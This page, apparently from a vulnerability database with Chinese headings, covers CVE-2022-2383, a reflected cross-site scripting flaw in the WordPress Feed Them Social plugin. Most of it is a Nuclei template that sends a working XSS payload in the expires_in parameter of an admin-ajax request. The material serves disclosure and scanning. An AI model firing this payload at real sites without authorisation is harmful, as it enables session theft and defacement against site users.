CVE-2022-2383: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Feed Them Social | POC: 已公开

漏洞描述

WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.

PoC代码[已公开]

id: CVE-2022-2383

info:
  name: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting
  author: akincibor
  severity: medium
  description: |
    WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
    - https://wordpress.org/plugins/feed-them-social/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2383
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2383
    cwe-id: CWE-79
    epss-score: 0.06392
    epss-percentile: 0.9065
    cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: slickremix
    product: "feed_them_social"
    framework: wordpress
  tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Feed Them Social'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(document.domain)><br/>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402204af4184050337aee136b5d2f6a0180591d4bf12267ee801577f684755046a8a90220691b2d33a028516a1410a6d8b71d5cdb48c4c932570bf4ac808a338b7f28034e:922c64590222798bb761d5b6d8e72950